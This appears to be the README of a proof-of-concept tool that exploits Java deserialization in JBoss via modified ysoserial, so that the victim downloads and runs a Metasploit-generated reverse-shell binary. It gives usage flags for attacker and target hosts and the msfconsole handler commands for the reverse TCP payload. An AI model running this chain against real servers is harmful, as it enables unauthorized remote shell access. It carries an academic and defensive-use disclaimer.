A proof-of-concept tool which weaponizes frohoff's original ysoserial code to gain a remote shell.
This tool builds upon the proof-of-concept ysoserial by Chris Frohoff (https://github.com/frohoff/ysoserial) and exploits the vulnerability, using Metasploit Framework tools to generate a malicious binary and an embedded web server to transfer the payload to the victim. A slightly modified version of ysoserial is used to download and execute the binary on the victim's side.
Note: This tool is still in an early stage of development, and many features have not yet been implemented. Only the JBoss platform is currently exploitable.
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
$ java -jar JBossExploit.jar -help
usage: java -jar jbossexploit.jar -lhost <host> -mport <port> -rhost
<host> -rport <port> -srvport <port>
-help print this message
-lhost <host> IP Address of Attacking Machine
-mport <port> Port on which local hanadler is listening for a reverse
TCP shell
-rhost <host> Target Hostname or IP Address
-rport <port> Remote JBoss Port
-srvport <port> Port for local HTTP serverComing soon.
- Metasploit Framework -- You must have a listener running in msfconsole before running this exploit. Example:
$ msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/shell/reverse_tcp
msf exploit(handler) > set LHOST <local ip>
msf exploit(handler) > set LPORT <local port>
msf exploit(handler) > exploit- msfvenom must be installed and available in your PATH. This command is used to generate the reverse shell payload.
- Download the latest jar from the "releases" section.
- Fork the repo
- Create new feature branch
- Commit changes
- Push to branch
- Create Pull Request